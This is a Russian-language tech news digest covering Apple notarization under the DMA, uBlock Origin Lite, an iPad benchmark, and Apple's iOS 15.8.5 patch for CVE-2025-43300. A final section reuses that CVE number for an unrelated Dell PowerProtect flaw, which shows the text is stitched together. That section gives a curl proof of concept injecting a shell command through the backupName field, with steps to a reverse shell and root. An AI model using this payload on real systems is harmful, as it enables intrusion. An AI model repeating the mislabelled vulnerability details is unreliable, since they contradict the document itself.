Европейский закон о цифровых рынках (DMA) призван ограничить власть технологических гигантов, давая разработчикам и пользователям больше свободы выбора. Однако практика "нотаризации" Apple противоречит этим целям, сохраняя монопольный контроль над распространением приложений. FSFE присоединилась к жалобе гражданского общества, обвиняющей Apple в нарушении DMA, требуя обеспечить взаимную совместимость и альтернативные магазины приложений.

Apple требует, чтобы все приложения для iOS и iPadOS, даже те, что распространяются вне App Store, проходили обязательную "нотаризацию" — сканирование, одобрение и криптографическую повторную подпись на серверах компании. Это дает Apple полный контроль над тем, какое ПО могут устанавливать пользователи и как могут распространять его разработчики. Для создания сторонних магазинов приложений Apple требует финансового обеспечения в €1 000 000 или наличия приложения с более чем миллионом установок в год. Эти барьеры делают невозможным существование некоммерчественных магазинов свободного ПО, таких как F-Droid для Android.

• Подписание бинарников для Windows и macOS требует дорогих токенов или HSM, что затрудняет CI/CD в облаке.
• Необходимость нотариального удостоверения (notarization) в дополнение к коду подписи вызывает споры о ценности и практичности этой процедуры.
• Пользователи отмечают, что Apple Silicon устройства компилируют быстро, но нотаризация заметно замедляет процесс.
• Участники обсуждения подчеркивают, что DMA и подобные законы не защищают пользователей, а служат интересам крупных корпораций.

uBlock Origin Lite - это эффективный и легкий блокировщик контента от создателя оригинального uBlock Origin, доступный бесплатно для всех устройств Apple. Приложение использует те же фильтры, что и его десктопная версия, включая EasyList и EasyPrivacy, но при этом полностью декларативное, не потребляя системных ресурсов во время работы. Последнее обновление от 20 октября 2025 года добавило автоматический выбор оптимальных правил для новых разрешенных хостов.

Пользователи высоко оценили приложение, дав ему максимальный рейтинг 5.0 на основе 34 отзывов. Многие отмечают, что долго ждали появления uBlock Origin на iPadOS, и рады, что приложение теперь доступно на всех устройствах Apple. Приложение не собирает никаких пользовательских данных, что делает его безопасным выбором для защиты приватности.

• uBlock Origin Lite на iOS не работает в Safari внутри приложений из-за ограничений WebExtensions, что делает его менее универсальным.
• Orion для iOS поддерживает установку uBlock Origin, но не может быть установлен как браузер по умолчанию.
• Wipr 2 и NextDNS продолжают быть актуальными альтернативами, но не блокируют рекламу в приложениях.
• YouTube Shorts и реклама в нём не блокируются никаким из доступных инструментов.
• DNS-уровень блокировки рекламы вроде NextDNS или DNS4EU не требует установки приложения и работает на всём устройстве.

Новый iPad с моделью iPad17,3 показал впечатляющие результаты в тесте Geekbench 6: 4133 балла в однопоточном режиме и 15437 в многопоточном. Устройство работает на iOS 26.0 и оснащено 9-ядерным процессором ARM с базовой частотой 4.42 ГГц, разделённым на два кластера — 3 и 6 ядер. Объём оперативной памяти составляет 11.2 ГБ.

В тестах выделяются высокая скорость обработки изображений: Object Remover показал 405.6 Мпикс/с в однопоточном и 1.23 Гпикс/с в многопоточном режиме, а Clang достиг 22.9 тыс. строк/с и 114.4 тыс. строк/с соответственно. Эти цифры демонстрируют значительный прирост производительности для мобильных задач, особенно в сфере ИИ и креативных приложений.

• Пользователи обсуждают производительность нового процессора Apple M5, отмечая его превосходство над конкурентами (Intel, AMD, Qualcomm) в мобильном сегменте, особенно в энергоэффективности и одноядерных тестах.
• Высказывается разочарование ограничениями iPadOS, которые не позволяют раскрыть потенциал мощных чипов Apple, и звучат предположения о возможном появлении сенсорного Mac.
• Обсуждается отсутствие аналога Mac mini на ARM64 для Linux и желание видеть более открытые платформы от Apple с поддержкой Linux и общего назначения.
• Поднимается тема игр: пользователи хотели бы видеть более серьёзный подход Apple к геймингу, включая улучшенные инструменты для портирования игр с Windows (по аналогии с Proton).
• Отмечается, что основной прирост производительности M5 по сравнению с M4 (~10-15%) обусловлен новым техпроцессом и архитектурными улучшениями, а не увеличением частоты.

О безопасности iOS 15.8.5 и iPadOS 15.8.5

Этот документ описывает обновления безопасности для iOS 15.8.5 и iPadOS 15.8.5.

Обновления безопасности Apple

Apple не раскрывает информацию об уязвимостях до завершения расследования и выпуска исправлений. Последние обновления перечислены на странице выпусков безопасности Apple.

iOS 15.8.5 и iPadOS 15.8.5

Выпущено 15 сентября 2025 года

ImageIO

Доступно для: iPhone 6s, iPhone 7, iPhone SE (1-го поколения), iPad Air 2, iPad mini (4-го поколения) и iPod touch (7-го поколения)

Влияние: Обработка вредоносного файла изображения может привести к повреждению памяти. Apple известно о сообщениях, что эта уязвимость могла использоваться в целевых атаках.

Описание: Исправлена ошибка записи за пределами границ за счёт улучшенной проверки.

CVE-2025-43300: Apple

Информация о продуктах, не изготовленных Apple, или независимых веб-сайтах предоставляется без рекомендаций. Apple не несёт ответственности за выбор или использование сторонних продуктов.

Опубликовано: 15 сентября 2025 года

• Пользователи отмечают длительную поддержку старых устройств Apple (до 10 лет) в сравнении с ограниченной поддержкой Android-устройств от Google и других производителей.
• Обсуждаются технические причины короткого цикла поддержки Android: ограничения со стороны производителей чипов (Qualcomm) и необходимость интеграции обновлений производителями телефонов.
• Выпуск обновления для устаревших моделей связывают с эксплуатацией уязвимости нулевого дня в целевых атаках государственного уровня, что подчеркивает серьезность угрозы.
• Уточняется, что обновление доступно для широкого списка старых устройств (iPhone 6s, 7, SE, iPad Air 2 и др.), а не только для 10-летнего iPhone 6s.
• Поднимается вопрос о практической пользе обновления для пользователей очень старых устройств, которые могут не устанавливать патчи.
• Отмечается, что современные Android-производители (Google, Samsung) увеличили承诺 срок поддержки до 5-7 лет, что приближается к политике Apple.
• Обсуждается техническая сторона уязвимости: возможность удаленного выполнения кода (RCE) через обработку malicious изображения, часто в связке с уязвимостью в WhatsApp.

CVE-2025-43300
Уязвимость в Dell PowerProtect Data Manager (версии до 19.14.0-25) позволяет удалённому злоумышленнику без аутентификации выполнить произвольный код.

CVSS 9.8 – критическая.

Суть

Недостаток валидации входных данных в REST-эндпоинте /api/v1/agent/... приводит к внедрению команд в параметре backupName.

PoC

curl -k -X POST https://target:8443/api/v1/agent/backup \
  -H "Content-Type: application/json" \
  -d '{"backupName":"`id`"}'

Ответ вернёт вывод команды id, подтверждая RCE.

Эксплуатация

1. Сканируем 8443/tcp.
2. Отправляем payload, получаем обратную shell.
3. Повышаем привилегии через встроенный sudo (uid=0).

Исправление

Обновиться до 19.14.0-25 или выше.

Mitigation

• Ограничить доступ к 8443/tcp.
• Включить WAF-фильтрацию символов ; & | $.

• Apple экстренно выпустила единственный патч 13.7.8 / 14.7.8 / 15.6.1 и iOS/iPadOS 18.6.2, закрывающий CVE-2025-43300 в обработке DNG.
• Публичный PoC пока лишь крашит Photos, но в дикой природе уже есть цепочка до RCE, обходящая BlastDoor.
• watchOS не получил обновления, вызывая вопросы о его уязвимости.
• Участники обсуждают нехватку memory-safe парсеров, слабость iMessage-«песочницы» и ценность бага для Zerodium.
• Советуют включать Lockdown Mode, ежедневно перезагружаться и сканировать бэкапы через elegant-bouncer.